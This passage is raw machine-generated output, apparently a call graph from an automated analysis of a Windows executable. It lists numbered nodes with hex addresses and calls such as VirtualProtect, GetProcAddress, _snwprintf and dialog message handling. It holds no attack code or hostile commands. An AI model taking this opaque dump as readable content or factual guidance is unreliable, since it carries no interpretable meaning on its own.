18828 7ff75fbb33f4 18807->18828 18808->18803 18808->18809 18812 7ff75fbb33f4 DloadReleaseSectionWriteAccess 6 API calls 18809->18812 18814 7ff75fbb36d5 18810->18814 18813 7ff75fbb361b RaiseException 18812->18813 18813->18815 18814->18807 18816 7ff75fbb33f4 DloadReleaseSectionWriteAccess 6 API calls 18814->18816 18815->18792 18817 7ff75fbb36f7 RaiseException 18816->18817 18818 7ff75fbb30e4 6 API calls 18817->18818 18819 7ff75fbb3711 18818->18819 18819->18807 18821 7ff75fbb30fa 18820->18821 18827 7ff75fbb315f 18820->18827 18836 7ff75fbb3190 18821->18836 18824 7ff75fbb315a 18826 7ff75fbb3190 DloadReleaseSectionWriteAccess 3 API calls 18824->18826 18826->18827 18827->18797 18827->18805 18829 7ff75fbb345d 18828->18829 18830 7ff75fbb3404 18828->18830 18829->18815 18831 7ff75fbb3190 DloadReleaseSectionWriteAccess 3 API calls 18830->18831 18832 7ff75fbb3409 18831->18832 18833 7ff75fbb3458 18832->18833 18834 7ff75fbb3364 DloadProtectSection 3 API calls 18832->18834 18835 7ff75fbb3190 DloadReleaseSectionWriteAccess 3 API calls 18833->18835 18834->18833 18835->18829 18837 7ff75fbb30ff 18836->18837 18838 7ff75fbb31ab 18836->18838 18837->18824 18843 7ff75fbb3364 18837->18843 18838->18837 18839 7ff75fbb31b0 GetModuleHandleW 18838->18839 18840 7ff75fbb31c5 18839->18840 18841 7ff75fbb31ca GetProcAddress 18839->18841 18840->18837 18841->18840 18842 7ff75fbb31df GetProcAddress 18841->18842 18842->18840 18844 7ff75fbb3386 DloadObtainSection 18843->18844 18845 7ff75fbb33c6 VirtualProtect 18844->18845 18846 7ff75fbb338e 18844->18846 18848 7ff75fbb3230 VirtualQuery 18844->18848 18845->18846 18846->18824 18849 7ff75fbb3259 18848->18849 18850 7ff75fbb3265 GetSystemInfo 18849->18850 18851 7ff75fbb32a9 18849->18851 18850->18851 18851->18845 19056 7ff75fbb25b0 19057 7ff75fbb25bc _snwprintf 19056->19057 19064 7ff75fb9fdf8 19057->19064 19065 7ff75fb9fe0b 19064->19065 19080 7ff75fb9eec4 19065->19080 19068 7ff75fb9fe70 LoadStringW 19069 7ff75fb9fe9e 19068->19069 19070 7ff75fb9fe89 LoadStringW 19068->19070 19071 7ff75fb945d8 19069->19071 19070->19069 19072 7ff75fb945fd _snwprintf 19071->19072 19521 7ff75fbba818 19072->19521 19075 7ff75fbaf3c8 PeekMessageW 19076 7ff75fbaf3e8 GetMessageW 19075->19076 19077 7ff75fbaf42c 19075->19077 19078 7ff75fbaf416 TranslateMessage DispatchMessageW 19076->19078 19079 7ff75fbaf407 IsDialogMessageW 19076->19079 19078->19077 19079->19077 19079->19078 19085 7ff75fb9edc0 19080->19085 19082 7ff75fb9ef05 19083 7ff75fb9ef1c 19082->19083 19093 7ff75fb9ef3c 19082->19093 19083->19068 19083->19069 19086 7ff75fb9ede4 19085->19086 19092 7ff75fb9ee7d 19085->19092 19088 7ff75fb9ee10 19086->19088 19097 7ff75fba3b98 WideCharToMultiByte 19086->19097 19091 7ff75fb9ee43 19088->19091 19099 7ff75fb9fda0 19088->19099 19103 7ff75fbbab74 19091->19103 19092->19082 19094 7ff75fb9ef5e 19093->19094 19096 7ff75fb9ef86 19093->19096 19095 7ff75fbbab74 31 API calls 19094->19095 19095->19096 19096->19083 19098 7ff75fba3bda 19097->19098 19098->19088 19100 7ff75fb9fdc5 _snwprintf 19099->19100 19109 7ff75fbba5e4 19100->19109 19104 7ff75fbbaba4 19103->19104 19105 7ff75fbbdedc memcpy_s 15 API calls 19104->19105 19108 7ff75fbbabb9 19104->19108 19106 7ff75fbbabae 19105->19106 19107 7ff75fbbdd48 _invalid_parameter_noinfo 31 API calls 19106->19107 19107->19108 19108->19092 19110 7ff75fbba642 19109->19110 19111 7ff75fbba62a 19109->19111 19110->19111 19112 7ff75fbba64c 19110->19112 19113 7ff75fbbdedc memcpy_s 15 API calls 19111->19113 19136 7ff75fbb8818 19112->19136 19115 7ff75fbba62f 19113->19115 19116 7ff75fbbdd48 _invalid_parameter_noinfo 31 API calls 19115->19116 19135 7ff75fbba63a 19116->19135 19117 7ff75fbc6b90 _handle_error 8 API calls 19119 7ff75fb9fde5 19117->19119 19118 7ff75fbba65d memcpy_s 19144 7ff75fbb871c 19118->19144 19119->19091 19124 7ff75fbba6d9 19126 7ff75fbbda18 __free_lconv_mon 15 API calls 19124->19126 19125 7ff75fbba708 19127 7ff75fbba784 19125->19127 19130 7ff75fbba70e 19125->19130 19132 7ff75fbba760 19125->19132 19134 7ff75fbba717 19125->19134 19126->19135 19128 7ff75fbba78e 19127->19128 19127->19132 19133 7ff75fbbda18 __free_lconv_mon 15 API calls 19128->19133 19129 7ff75fbbda18 __free_lconv_mon 15 API calls 19129->19135 19130->19132 19130->19134 19131 7ff75fbbda18 __free_lconv_mon 15 API calls 19131->19135 19132->19131 19133->19135 19134->19129 19135->19117 19137 7ff75fbb8833 19136->19137 19143 7ff75fbb882e 19136->19143 19138 7ff75fbbe5c0 abort 35 API calls 19137->19138 19137->19143 19139 7ff75fbb8850 19138->19139 19163 7ff75fbbe764 19139->19163 19143->19118 19145 7ff75fbbdedc memcpy_s 15 API calls 19144->19145 19146 7ff75fbb878b 19145->19146 19147 7ff75fbb8a1c 19146->19147 19148 7ff75fbb8a50 19147->19148 19149 7ff75fbb8a38 19147->19149 19148->19149 19160 7ff75fbb8a57 19148->19160 19150 7ff75fbbdedc memcpy_s 15 API calls 19149->19150 19151 7ff75fbb8a3d 19150->19151 19152 7ff75fbbdd48 _invalid_parameter_noinfo 31 API calls 19151->19152 19158 7ff75fbb8a48 19152->19158 19153 7ff75fbb8c0a 19154 7ff75fbbdedc memcpy_s 15 API calls 19153->19154 19156 7ff75fbb8c0f 19154->19156 19157 7ff75fbbdd48 _invalid_parameter_noinfo 31 API calls 19156->19157 19157->19158 19158->19124 19158->19125 19160->19153 19160->19158 19195 7ff75fbb92c8 19160->19195 19211 7ff75fbb8fa8 19160->19211 19233 7ff75fbb8918 19160->19233 19236 7ff75fbb8e9c 19160->19236 19164 7ff75fbb8874 19163->19164 19165 7ff75fbbe779 19163->19165 19167 7ff75fbbe798 19164->19167 19165->19164 19171 7ff75fbc2810 19165->19171 19168 7ff75fbbe7c0 19167->19168 19169 7ff75fbbe7ad 19167->19169 19168->19143 19169->19168 19183 7ff75fbc1328 19169->19183 19172 7ff75fbbe5c0 abort 35 API calls 19171->19172 19173 7ff75fbc281f 19172->19173 19174 7ff75fbc2871 19173->19174 19182 7ff75fbbff68 EnterCriticalSection 19173->19182 19174->19164 19184 7ff75fbbe5c0 abort 35 API calls 19183->19184 19185 7ff75fbc1337 19184->19185 19186 7ff75fbc1352 19185->19186 19194 7ff75fbbff68 EnterCriticalSection 19185->19194 19188 7ff75fbc13d8 19186->19188 19191 7ff75fbbd958 abort 35 API calls 19186->19191 19188->19168 19191->19188 19196 7ff75fbb934f 19195->19196 19206 7ff75fbb92f2 19195->19206 19197 7ff75fbb9354 19196->19197 19198 7ff75fbb93d3 19196->19198 19200 7ff75fbb93b9 19197->19200 19201 7ff75fbb935e 19197->19201 19259 7ff75fbb9910 19198->19259 19247 7ff75fbba06c 19200->19247 19202 7ff75fbb93dc _snwprintf 19201->19202 19209 7ff75fbb9340 _snwprintf 19201->19209 19253 7ff75fbb9ecc 19201->19253 19202->19160 19206->19198 19206->19201 19206->19202 19207 7ff75fbb9322 19206->19207 19208 7ff75fbb9330 19206->19208 19206->19209 19207->19198 19207->19208 19207->19209 19208->19202 19243 7ff75fbb9d70 19208->19243 19209->19202 19267 7ff75fbba2a0 19209->19267 19212 7ff75fbb8fb3 19211->19212 19213 7ff75fbb8fcc 19211->19213 19215 7ff75fbb934f 19212->19215 19216 7ff75fbb8ff0 19212->19216 19228 7ff75fbb92f2 19212->19228 19214 7ff75fbbdedc memcpy_s 15 API calls 19213->19214 19213->19216 19217 7ff75fbb8fe5 19214->19217 19218 7ff75fbb9354 19215->19218 19219 7ff75fbb93d3 19215->19219 19216->19160 19221 7ff75fbbdd48 _invalid_parameter_noinfo 31 API calls 19217->19221 19223 7ff75fbb93b9 19218->19223 19224 7ff75fbb935e 19218->19224 19220 7ff75fbb9910 _snwprintf 43 API calls 19219->19220 19230 7ff75fbb9340 _snwprintf 19220->19230 19221->19216 19222 7ff75fbb9330 19225 7ff75fbb9d70 _snwprintf 37 API calls 19222->19225 19232 7ff75fbb93dc _snwprintf 19222->19232 19226 7ff75fbba06c swprintf 31 API calls 19223->19226 19227 7ff75fbb9ecc swprintf 31 API calls 19224->19227 19224->19230 19224->19232 19225->19230 19226->19230 19227->19230 19228->19219 19228->19222 19228->19224 19229 7ff75fbb9322 19228->19229 19228->19230 19228->19232 19229->19219 19229->19222 19229->19230 19231 7ff75fbba2a0 _snwprintf 37 API calls 19230->19231 19230->19232 19231->19232 19232->19160 19481 7ff75fbbdefc 19233->19481 19515 7ff75fbb8f10 19236->19515 19239 7ff75fbbdedc memcpy_s 15 API calls 19240 7ff75fbb8efd 19239->19240 19241 7ff75fbbdd48 _invalid_parameter_noinfo 31 API calls 19240->19241 19242 7ff75fbb8eb0 19241->19242 19242->19160 19245 7ff75fbb9d8c _snwprintf 19243->19245 19244 7ff75fbb9dd5 19244->19209 19245->19244 19273 7ff75fbbe230 19245->19273 19252 7ff75fbba094 swprintf 19247->19252 19248 7ff75fbbdedc memcpy_s 15 API calls 19249 7ff75fbba09d 19248->19249 19250 7ff75fbbdd48 _invalid_parameter_noinfo 31 API calls 19249->19250 19251 7ff75fbba0a8 19250->19251 19251->19209 19252->19248 19252->19251 19254 7ff75fbb9eed 19253->19254 19255 7ff75fbbdedc memcpy_s 15 API calls 19254->19255 19258 7ff75fbb9f38 swprintf 19254->19258 19256 7ff75fbb9f2d 19255->19256 19257 7ff75fbbdd48 _invalid_parameter_noinfo 31 API calls 19256->19257 19257->19258 19258->19209 19260 7ff75fbb9928 19259->19260 19295 7ff75fbb83f8 19260->19295 19266 7ff75fbb9a63 19266->19209 19271 7ff75fbba32d _snwprintf 19267->19271 19272 7ff75fbba2c7 _snwprintf 19267->19272 19268 7ff75fbbe230 _snwprintf 37 API calls 19268->19272 19269 7ff75fbc6b90 _handle_error 8 API calls 19270 7ff75fbba365 19269->19270 19270->19202 19271->19269 19272->19268 19272->19271 19276 7ff75fbbe0ac 19273->19276 19277 7ff75fbbe0cf 19276->19277 19278 7ff75fbbe0d4 19277->19278 19279 7ff75fbbe106 19277->19279 19280 7ff75fbbe0f3 19277->19280 19278->19244 19281 7ff75fbb8818 swprintf 35 API calls 19279->19281 19282 7ff75fbbdedc memcpy_s 15 API calls 19280->19282 19283 7ff75fbbe118 19281->19283 19284 7ff75fbbe0f8 19282->19284 19285 7ff75fbbe1a0 WideCharToMultiByte 19283->19285 19286 7ff75fbbe127 19283->19286 19287 7ff75fbbdd48 _invalid_parameter_noinfo 31 API calls 19284->19287 19289 7ff75fbbe1f4 GetLastError 19285->19289 19290 7ff75fbbe139 memcpy_s 19285->19290 19288 7ff75fbbe183 memcpy_s 19286->19288 19286->19290 19287->19278 19288->19278 19292 7ff75fbbdedc memcpy_s 15 API calls 19288->19292 19289->19288 19289->19290 19290->19278 19291 7ff75fbbdedc memcpy_s 15 API calls 19290->19291 19291->19278 19293 7ff75fbbe21f 19292->19293 19294 7ff75fbbdd48 _invalid_parameter_noinfo 31 API calls 19293->19294 19294->19278 19296 7ff75fbb8425 19295->19296 19297 7ff75fbb8434 19295->19297 19298 7ff75fbbdedc memcpy_s 15 API calls 19296->19298 19299 7ff75fbb842a 19297->19299 19337 7ff75fbbda58 19297->19337 19298->19299 19305 7ff75fbbf204 19299->19305 19302 7ff75fbb8474 19304 7ff75fbbda18 __free_lconv_mon 15 API calls 19302->19304 19303 7ff75fbbda18 __free_lconv_mon 15 API calls 19303->19302 19304->19299 19306 7ff75fbbf231 19305->19306 19308 7ff75fbbf249 19305->19308 19307 7ff75fbbdedc memcpy_s 15 API calls 19306->19307 19309 7ff75fbbf236 19307->19309 19308->19306 19312 7ff75fbbf260 _snwprintf 19308->19312 19310 7ff75fbbdd48 _invalid_parameter_noinfo 31 API calls 19309->19310 19311 7ff75fbb9a46 19310->19311 19311->19266 19330 7ff75fbb88a8 19311->19330 19316 7ff75fbbf2b4 19312->19316 19319 7ff75fbbf293 19312->19319 19313 7ff75fbbf3f0 19313->19311 19461 7ff75fbbe834 19313->19461 19314 7ff75fbbf3b7 19454 7ff75fbbeb94 19314->19454 19316->19313 19316->19314 19317 7ff75fbbf32d 19316->19317 19320 7ff75fbbf2f1 19316->19320 19323 7ff75fbbf2e3 19316->19323 19387 7ff75fbc2e80 19317->19387 19344 7ff75fbbf0c0 19319->19344 19377 7ff75fbbef88 19320->19377 19323->19314 19326 7ff75fbbf2ec 19323->19326 19326->19317 19326->19320 19328 7ff75fbbf384 19328->19311 19451 7ff75fbbee40 19328->19451 19471 7ff75fbbc4ac 19330->19471 19332 7ff75fbb88c0 19333 7ff75fbb88d4 19332->19333 19475 7ff75fbbddb0 19332->19475 19335 7ff75fbbc4ac _snwprintf 43 API calls 19333->19335 19336 7ff75fbb88dc 19335->19336 19336->19266 19338 7ff75fbbdaa3 19337->19338 19342 7ff75fbbda67 abort 19337->19342 19339 7ff75fbbdedc memcpy_s 15 API calls 19338->19339 19341 7ff75fbb8460 19339->19341 19340 7ff75fbbda8a RtlAllocateHeap 19340->19341 19340->19342 19341->19302 19341->19303 19342->19338 19342->19340 19343 7ff75fbbc50c abort EnterCriticalSection LeaveCriticalSection 19342->19343 19343->19342 19345 7ff75fbbf0ee 19344->19345 19348 7ff75fbbf10c 19344->19348 19346 7ff75fbc6b90 _handle_error 8 API calls 19345->19346 19347 7ff75fbbf103 19346->19347 19347->19311 19349 7ff75fbbd9b0 __std_exception_copy 31 API calls 19348->19349 19350 7ff75fbbf1e4 19349->19350 19350->19345 19351 7ff75fbbf1ec 19350->19351 19352 7ff75fbbdd68 _invalid_parameter_noinfo 16 API calls 19351->19352 19354 7ff75fbbf201 19352->19354 19353 7ff75fbbf231 19355 7ff75fbbdedc memcpy_s 15 API calls 19353->19355 19354->19353 19357 7ff75fbbf260 _snwprintf 19354->19357 19356 7ff75fbbf236 19355->19356 19358 7ff75fbbdd48 _invalid_parameter_noinfo 31 API calls 19356->19358 19364 7ff75fbbf293 19357->19364 19366 7ff75fbbf2b4 19357->19366 19367 7ff75fbbf242 19358->19367 19359 7ff75fbbf3f0 19361 7ff75fbbe834 _snwprintf 35 API calls 19359->19361 19359->19367 19360 7ff75fbbf3b7 19363 7ff75fbbeb94 _snwprintf 35 API calls 19360->19363 19361->19367 19362 7ff75fbbf32d 19368 7ff75fbc2e80 _snwprintf 31 API calls 19362->19368 19363->19367 19369 7ff75fbbf0c0 _snwprintf 35 API calls 19364->19369 19365 7ff75fbbf2f1 19371 7ff75fbbef88 _snwprintf 35 API calls 19365->19371 19366->19359 19366->19360 19366->19362 19366->19365 19370 7ff75fbbf2e3 19366->19370 19367->19311 19372 7ff75fbbf357 19368->19372 19369->19367 19370->19360 19373 7ff75fbbf2ec 19370->19373 19371->19367 19374 7ff75fbc28e8 _snwprintf 31 API calls 19372->19374 19373->19362 19373->19365 19375 7ff75fbbf384 19374->19375 19375->19367 19376 7ff75fbbee40 _snwprintf 35 API calls 19375->19376 19376->19367 19378 7ff75fbc2e80 _snwprintf 31 API calls 19377->19378 19379 7ff75fbbefcc 19378->19379 19380 7ff75fbc28e8 _snwprintf 31 API calls 19379->19380 19381 7ff75fbbf005 19380->19381 19382 7ff75fbbf067 19381->19382 19383 7ff75fbbf02b 19381->19383 19386 7ff75fbbf009 19381->19386 19384 7ff75fbbec64 _snwprintf 35 API calls 19382->19384 19385 7ff75fbbee40 _snwprintf 35 API calls 19383->19385 19384->19386 19385->19386 19386->19311 19388 7ff75fbc2ece fegetenv _snwprintf 19387->19388 19389 7ff75fbc2f3b 19388->19389 19392 7ff75fbc2f62 _snwprintf 19388->19392 19390 7ff75fbbd9b0 __std_exception_copy 31 API calls 19389->19390 19391 7ff75fbc2f55 19390->19391 19393 7ff75fbc40ce _snwprintf 19391->19393 19394 7ff75fbc2f5d 19391->19394 19395 7ff75fbc2f81 19392->19395 19396 7ff75fbc4130 19392->19396 19403 7ff75fbc6b90 _handle_error 8 API calls 19393->19403 19400 7ff75fbbdd68 _invalid_parameter_noinfo 16 API calls 19394->19400 19398 7ff75fbc4111 19395->19398 19399 7ff75fbc2f8a 19395->19399 19397 7ff75fbbd9b0 __std_exception_copy 31 API calls 19396->19397 19402 7ff75fbc4146 19397->19402 19401 7ff75fbbd9b0 __std_exception_copy 31 API calls 19398->19401 19404 7ff75fbc40f2 19399->19404 19405 7ff75fbc2f93 19399->19405 19407 7ff75fbc40ed 19400->19407 19408 7ff75fbc4127 19401->19408 19402->19393 19409 7ff75fbc41d5 19402->19409 19410 7ff75fbbf357 19403->19410 19406 7ff75fbbd9b0 __std_exception_copy 31 API calls 19404->19406 19411 7ff75fbc40d3 19405->19411 19422 7ff75fbc2f9c memcpy_s _snwprintf 19405->19422 19412 7ff75fbc4108 19406->19412 19417 7ff75fbbdd68 _invalid_parameter_noinfo 16 API calls 19407->19417 19408->19393 19413 7ff75fbc412b 19408->19413 19415 7ff75fbbdd68 _invalid_parameter_noinfo 16 API calls 19409->19415 19442 7ff75fbc28e8 19410->19442 19414 7ff75fbbd9b0 __std_exception_copy 31 API calls 19411->19414 19412->19393 19416 7ff75fbc410c 19412->19416 19420 7ff75fbbdd68 _invalid_parameter_noinfo 16 API calls 19413->19420 19418 7ff75fbc40e9 19414->19418 19419 7ff75fbc41ea 19415->19419 19421 7ff75fbbdd68 _invalid_parameter_noinfo 16 API calls 19416->19421 19417->19416 19418->19393 19418->19407 19420->19409 19421->19413 19423 7ff75fbbdedc memcpy_s 15 API calls 19422->19423 19428 7ff75fbc3098 memcpy_s 19422->19428 19425 7ff75fbc353c 19423->19425 19424 7ff75fbc3e55 19427 7ff75fbc29b0 _snwprintf 31 API calls 19424->19427 19426 7ff75fbbdd48 _invalid_parameter_noinfo 31 API calls 19425->19426 19426->19428 19431 7ff75fbc3f04 19427->19431 19434 7ff75fbc3a1a memcpy_s 19428->19434 19436 7ff75fbc355c memcpy_s 19428->19436 19429 7ff75fbc394a 19429->19424 19429->19429 19430 7ff75fbc41ec memcpy_s 31 API calls 19429->19430 19430->19424 19433 7ff75fbc41ec memcpy_s 31 API calls 19431->19433 19438 7ff75fbc3f5c 19431->19438 19432 7ff75fbbdedc 15 API calls memcpy_s 19432->19434 19433->19438 19434->19424 19434->19429 19434->19432 19437 7ff75fbbdd48 31 API calls _invalid_parameter_noinfo 19434->19437 19435 7ff75fbbdedc 15 API calls memcpy_s 19435->19436 19436->19429 19436->19435 19439 7ff75fbbdd48 31 API calls _invalid_parameter_noinfo 19436->19439 19437->19434 19438->19393 19440 7ff75fbc29b0 _snwprintf 31 API calls 19438->19440 19441 7ff75fbc41ec memcpy_s 31 API calls 19438->19441 19439->19436 19440->19438 19441->19438 19443 7ff75fbc28f5 19442->19443 19444 7ff75fbc290d 19442->19444 19445 7ff75fbbdedc memcpy_s 15 API calls 19443->19445 19450 7ff75fbc2906 memcpy_s 19443->19450 19444->19443 19446 7ff75fbc2926 19444->19446 19447 7ff75fbc28fa 19445->19447 19448 7ff75fbbdedc memcpy_s 15 API calls 19446->19448 19449 7ff75fbbdd48 _invalid_parameter_noinfo 31 API calls 19447->19449 19448->19447 19449->19450 19450->19328 19450->19450 19452 7ff75fbb8818 swprintf 35 API calls 19451->19452 19453 7ff75fbbee70 memcpy_s 19452->19453 19453->19311 19455 7ff75fbc2e80 _snwprintf 31 API calls 19454->19455 19456 7ff75fbbebd0 19455->19456 19457 7ff75fbc28e8 _snwprintf 31 API calls 19456->19457 19458 7ff75fbbec06 19457->19458 19459 7ff75fbbec0a 19458->19459 19460 7ff75fbbec64 _snwprintf 35 API calls 19458->19460 19459->19311 19460->19459 19462 7ff75fbb8818 swprintf 35 API calls 19461->19462 19463 7ff75fbbe881 19462->19463 19464 7ff75fbbe8a2 19463->19464 19465 7ff75fbbe88c 19463->19465 19468 7ff75fbbeb94 _snwprintf 35 API calls 19464->19468 19470 7ff75fbbe89d memcpy_s _snwprintf 19464->19470 19466 7ff75fbbdedc memcpy_s 15 API calls 19465->19466 19467 7ff75fbbe891 19466->19467 19469 7ff75fbbdd48 _invalid_parameter_noinfo 31 API calls 19467->19469 19468->19470 19469->19470 19470->19311 19472 7ff75fbbc4ba 19471->19472 19474 7ff75fbbc4c1 19471->19474 19473 7ff75fbbc22c _snwprintf 43 API calls 19472->19473 19473->19474 19474->19332 19476 7ff75fbbddc3 19475->19476 19479 7ff75fbbddeb 19475->19479 19477 7ff75fbb8818 swprintf 35 API calls 19476->19477 19478 7ff75fbbddcf 19477->19478 19478->19479 19480 7ff75fbbf974 _snwprintf 39 API calls 19478->19480 19479->19332 19480->19479 19482 7ff75fbbdf15 swprintf 19481->19482 19485 7ff75fbbb6c8 19482->19485 19486 7ff75fbbb6f6 19485->19486 19487 7ff75fbbb71c 19485->19487 19488 7ff75fbbdedc memcpy_s 15 API calls 19486->19488 19487->19486 19489 7ff75fbbb72a 19487->19489 19491 7ff75fbbb6fb 19488->19491 19490 7ff75fbb8818 swprintf 35 API calls 19489->19490 19494 7ff75fbbb736 19490->19494 19492 7ff75fbbdd48 _invalid_parameter_noinfo 31 API calls 19491->19492 19505 7ff75fbb8959 19492->19505 19495 7ff75fbbb78c 19494->19495 19506 7ff75fbbf974 19494->19506 19496 7ff75fbbb806 19495->19496 19497 7ff75fbbdedc memcpy_s 15 API calls 19495->19497 19498 7ff75fbbdedc memcpy_s 15 API calls 19496->19498 19499 7ff75fbbb8f8 swprintf 19496->19499 19500 7ff75fbbb83e 19497->19500 19501 7ff75fbbb8ed 19498->19501 19504 7ff75fbbdedc memcpy_s 15 API calls 19499->19504 19499->19505 19502 7ff75fbbdd48 _invalid_parameter_noinfo 31 API calls 19500->19502 19503 7ff75fbbdd48 _invalid_parameter_noinfo 31 API calls 19501->19503 19502->19496 19503->19499 19504->19505 19505->19160 19507 7ff75fbb8818 swprintf 35 API calls 19506->19507 19508 7ff75fbbf9ae 19507->19508 19509 7ff75fbbf9b8 19508->19509 19510 7ff75fbbfaec swprintf 35 API calls 19508->19510 19512 7ff75fbc6b90 _handle_error 8 API calls 19509->19512 19511 7ff75fbbf9da 19510->19511 19514 7ff75fbc2328 _snwprintf 39 API calls 19511->19514 19513 7ff75fbbfa6a 19512->19513 19513->19494 19514->19509 19516 7ff75fbb8eac 19515->19516 19517 7ff75fbb8f36 19515->19517 19516->19239 19516->19242 19517->19516 19518 7ff75fbbdedc memcpy_s 15 API calls 19517->19518 19519 7ff75fbb8f8f 19518->19519 19520 7ff75fbbdd48 _invalid_parameter_noinfo 31 API calls 19519->19520 19520->19516 19522 7ff75fbba876 19521->19522 19523 7ff75fbba85e 19521->19523 19522->19523 19525 7ff75fbba880 19522->19525 19524 7ff75fbbdedc memcpy_s 15 API calls 19523->19524 19526 7ff75fbba863 19524->19526 19527 7ff75fbb8818 swprintf 35 API calls 19525->19527 19528 7ff75fbbdd48 _invalid_parameter_noinfo 31 API calls 19526->19528 19529 7ff75fbba891 memcpy_s 19527->19529 19547 7ff75fbba86e 19528->19547 19548 7ff75fbb8798 19529->19548 19530 7ff75fbc6b90 _handle_error 8 API calls 19531 7ff75fb94619 SetDlgItemTextW 19530->19531 19531->19075 19536 7ff75fbba90d 19538 7ff75fbbda18 __free_lconv_mon 15 API calls 19536->19538 19537 7ff75fbba93c 19539 7ff75fbba994 19537->19539 19540 7ff75fbba9ba 19537->19540 19541 7ff75fbba94b 19537->19541 19543 7ff75fbba942 19537->19543 19538->19547 19544 7ff75fbbda18 __free_lconv_mon 15 API calls 19539->19544 19540->19539 19545 7ff75fbba9c4 19540->19545 19542 7ff75fbbda18 __free_lconv_mon 15 API calls 19541->19542 19542->19547 19543->19539 19543->19541 19544->19547 19546 7ff75fbbda18 __free_lconv_mon 15 API calls 19545->19546 19546->19547 19547->19530 19549 7ff75fbbdedc memcpy_s 15 API calls 19548->19549 19550 7ff75fbb880a 19549->19550 19551 7ff75fbb8c20 19550->19551 19552 7ff75fbb8c5f 19551->19552 19553 7ff75fbb8c47 19551->19553 19552->19553 19563 7ff75fbb8c65 19552->19563 19554 7ff75fbbdedc memcpy_s 15 API calls 19553->19554 19555 7ff75fbb8c4c 19554->19555 19557 7ff75fbbdd48 _invalid_parameter_noinfo 31 API calls 19555->19557 19556 7ff75fbb8c57 19556->19536 19556->19537 19557->19556 19558 7ff75fbb8e85 19559 7ff75fbbdedc memcpy_s 15 API calls 19558->19559 19560 7ff75fbb8e8a 19559->19560 19561 7ff75fbbdd48 _invalid_parameter_noinfo 31 API calls 19560->19561 19561->19556 19563->19556 19563->19558 19566 7ff75fbb9544 19563->19566 19584 7ff75fbb9124 19563->19584 19608 7ff75fbb899c 19563->19608 19567 7ff75fbb95e2 19566->19567 19578 7ff75fbb9587 19566->19578 19568 7ff75fbb9666 19567->19568 19569 7ff75fbb95e7 19567->19569 19615 7ff75fbb9b2c 19568->19615 19571 7ff75fbb964c 19569->19571 19575 7ff75fbb95f1 19569->19575 19574 7ff75fbba06c swprintf 31 API calls 19571->19574 19572 7ff75fbb95c3 19583 7ff75fbb966f swprintf 19572->19583 19611 7ff75fbb9e24 19572->19611 19581 7ff75fbb95d3 swprintf 19574->19581 19576 7ff75fbb9ecc swprintf 31 API calls 19575->19576 19575->19581 19575->19583 19576->19581 19577 7ff75fbc6b90 _handle_error 8 API calls 19579 7ff75fbb97ef 19577->19579 19578->19568 19578->19572 19578->19575 19580 7ff75fbb95b5 19578->19580 19578->19581 19578->19583 19579->19563 19580->19568 19580->19572 19580->19581 19581->19583 19623 7ff75fbba378 19581->19623 19583->19577 19585 7ff75fbb912f 19584->19585 19586 7ff75fbb9148 19584->19586 19587 7ff75fbb916f 19585->19587 19588 7ff75fbb95e2 19585->19588 19601 7ff75fbb9587 19585->19601 19586->19587 19589 7ff75fbbdedc memcpy_s 15 API calls 19586->19589 19587->19563 19590 7ff75fbb9666 19588->19590 19591 7ff75fbb95e7 19588->19591 19592 7ff75fbb9164 19589->19592 19593 7ff75fbb9b2c swprintf 43 API calls 19590->19593 19595 7ff75fbb964c 19591->19595 19599 7ff75fbb95f1 19591->19599 19594 7ff75fbbdd48 _invalid_parameter_noinfo 31 API calls 19592->19594 19605 7ff75fbb95d3 swprintf 19593->19605 19594->19587 19598 7ff75fbba06c swprintf 31 API calls 19595->19598 19596 7ff75fbb95c3 19597 7ff75fbb9e24 swprintf 37 API calls 19596->19597 19607 7ff75fbb966f swprintf 19596->19607 19597->19605 19598->19605 19600 7ff75fbb9ecc swprintf 31 API calls 19599->19600 19599->19605 19599->19607 19600->19605 19601->19590 19601->19596 19601->19599 19603 7ff75fbb95b5 19601->19603 19601->19605 19601->19607 19602 7ff75fbc6b90 _handle_error 8 API calls 19604 7ff75fbb97ef 19602->19604 19603->19590 19603->19596 19603->19605 19604->19563 19606 7ff75fbba378 swprintf 37 API calls 19605->19606 19605->19607 19606->19607 19607->19602 19642 7ff75fbbdf2c 19608->19642 19612 7ff75fbb9e57 swprintf 19611->19612 19613 7ff75fbb9e8b 19612->19613 19627 7ff75fbbdf5c 19612->19627 19613->19581 19616 7ff75fbb9b50 19615->19616 19617 7ff75fbb83f8 _snwprintf 16 API calls 19616->19617 19618 7ff75fbb9b9a 19617->19618 19619 7ff75fbbf204 _snwprintf 35 API calls 19618->19619 19620 7ff75fbb9c79 19619->19620 19621 7ff75fbb88a8 _snwprintf 43 API calls 19620->19621 19622 7ff75fbb9c96 19620->19622 19621->19622 19622->19581 19624 7ff75fbba425 swprintf 19623->19624 19626 7ff75fbba39b 19623->19626 19624->19583 19625 7ff75fbbdf5c swprintf 37 API calls 19625->19626 19626->19624 19626->19625 19628 7ff75fbbdf86 19627->19628 19629 7ff75fbbdf90 19627->19629 19628->19629 19630 7ff75fbb8818 swprintf 35 API calls 19628->19630 19629->19613 19631 7ff75fbbdfc3 19630->19631 19631->19629 19639 7ff75fbbfaec 19631->19639 19634 7ff75fbbe04d MultiByteToWideChar 19634->19629 19636 7ff75fbbe039 19634->19636 19635 7ff75fbbdffc 19635->19636 19637 7ff75fbbe00f MultiByteToWideChar 19635->19637 19636->19629 19638 7ff75fbbdedc memcpy_s 15 API calls 19636->19638 19637->19629 19637->19636 19638->19629 19640 7ff75fbb8818 swprintf 35 API calls 19639->19640 19641 7ff75fbbdff3 19640->19641 19641->19634 19641->19635 19643 7ff75fbbdf45 swprintf 19642->19643 19646 7ff75fbbb9dc 19643->19646 19647 7ff75fbbba2f 19646->19647 19648 7ff75fbbba09 19646->19648 19647->19648 19649 7ff75fbbba3d 19647->19649 19650 7ff75fbbdedc memcpy_s 15 API calls 19648->19650 19651 7ff75fbb8818 swprintf 35 API calls 19649->19651 19652 7ff75fbbba0e 19650->19652 19655 7ff75fbbba4a 19651->19655 19653 7ff75fbbdd48 _invalid_parameter_noinfo 31 API calls 19652->19653 19666 7ff75fbb89db 19653->19666 19657 7ff75fbbba81 19655->19657 19667 7ff75fbbf904 19655->19667 19656 7ff75fbbbcef 19659 7ff75fbbbfc3 swprintf 19656->19659 19661 7ff75fbbdedc memcpy_s 15 API calls 19656->19661 19657->19656 19658 7ff75fbbdedc memcpy_s 15 API calls 19657->19658 19660 7ff75fbbbd33 19658->19660 19665 7ff75fbbdedc memcpy_s 15 API calls 19659->19665 19659->19666 19662 7ff75fbbdd48 _invalid_parameter_noinfo 31 API calls 19660->19662 19663 